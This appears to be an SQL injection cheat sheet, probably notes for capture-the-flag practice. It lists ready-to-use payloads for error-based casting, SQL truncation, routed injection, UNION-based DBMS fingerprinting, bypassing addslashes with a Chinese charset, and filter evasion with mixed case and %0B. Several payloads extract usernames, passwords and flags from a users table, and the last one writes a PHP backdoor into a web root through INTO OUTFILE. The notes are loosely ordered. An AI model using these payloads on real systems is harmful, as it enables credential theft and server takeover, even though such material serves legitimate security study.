Order=,cast(( SELECT table_name FROM information_schema.tables WHERE table_catalog=current_database() LIMIT 1 OFFSET 1 ) as numeric) # Get the table (using LIMIT/OFFSET allows iteration)
&order=,cast((chr(95)||current_database()) as numeric)
# insert into users values(’admin *20 Mou’,’hackedMan’)
Error-based SQL Injection
# Everything is based on the output; from it you can then identify the DBMS (SGBD)
# insert into users values(’admin’,’findMeIfYouCan’)
# create table users (username varchar(10), password varchar(20))
SQL Truncation
# You can bypass some SQL restrictions by playing with the variable size limits
S\' group by 2- ds\' union select email, password from users- d
Routed SQL Injection
# Routed → Double SQL Injection → The first result is injected into the second one
Recherche=’ union select username,year from users
Recherche=’ union select username,password from users
Recherche=’union select null,sql FROM sqlite_master WHERE tbl_name = ’users’ AND type = ’table’
Recherche=’ union select name,null from sqlite_master where type=’table’
Recherche=’ union select null,null from sqlite_master → OK → SQLite
Recherche=’ union select version(),null → NOK → Not PostgreSQL
Recherche=’ union select version,null from v$instance → NOK → Not Oracle
Recherche=’ union select versionnumber,null from sysibm.sysversions → NOK → Not DB2
Recherche=’ union select → NOK → Not MySQL / MSSQL
Recherche=’ union select null,null from users
This means that the added backslash will be interpreted as part of a Chinese character, and so the quote will still be interpreted
# Possible to bypass addslashes and magic_quotes_gpc using a Chinese charset
# If sha1 is used with binary-string output (true), you can use a hash to bypass conditions and inject SQL
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
// %0B can be used in place of a space
UNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
UNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
Union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'